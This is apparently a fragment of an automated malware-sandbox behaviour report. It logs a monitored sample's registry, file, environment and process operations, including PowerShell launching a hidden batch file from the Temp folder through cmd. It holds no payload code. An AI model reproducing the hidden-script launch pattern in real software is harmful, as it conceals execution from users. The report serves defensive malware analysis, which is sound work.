| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat | show_window = SW_HIDE |
|
1 | |
| Get Info | type = PROCESS_BASIC_INFORMATION |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
4 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
125 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\aDU0VK IWA5kLS |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\aDU0VK IWA5kLS |
|
1 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\aDU0VK IWA5kLS\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd /c ""C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat" " |
| Initial Working Directory | C:\Users\aDU0VK IWA5kLS\Desktop\ |
| Monitor | Start Time: 00:01:01, Reason: Child Process |
| Unmonitor | End Time: 00:02:26, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:25 |
| Information | Value |
|---|---|
| PID | 0xa24 |
| Parent PID | 0x9f8 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | AUFDDCNTXWT\aDU0VK IWA5kLS |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A28
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Get Info | C:\Users\aDU0VK IWA5kLS\Desktop | type = file_attributes |
|
2 | |
| Get Info | "C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat" | type = file_attributes |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
5 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE |
|
22 | ||
| Open | STD_INPUT_HANDLE |
|
4 | ||
| Open | STD_INPUT_HANDLE |
|
4 | ||
| Open | STD_INPUT_HANDLE |
|
7 | ||
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 332 |
|
1 | |
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 10 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 321 |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | ||
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
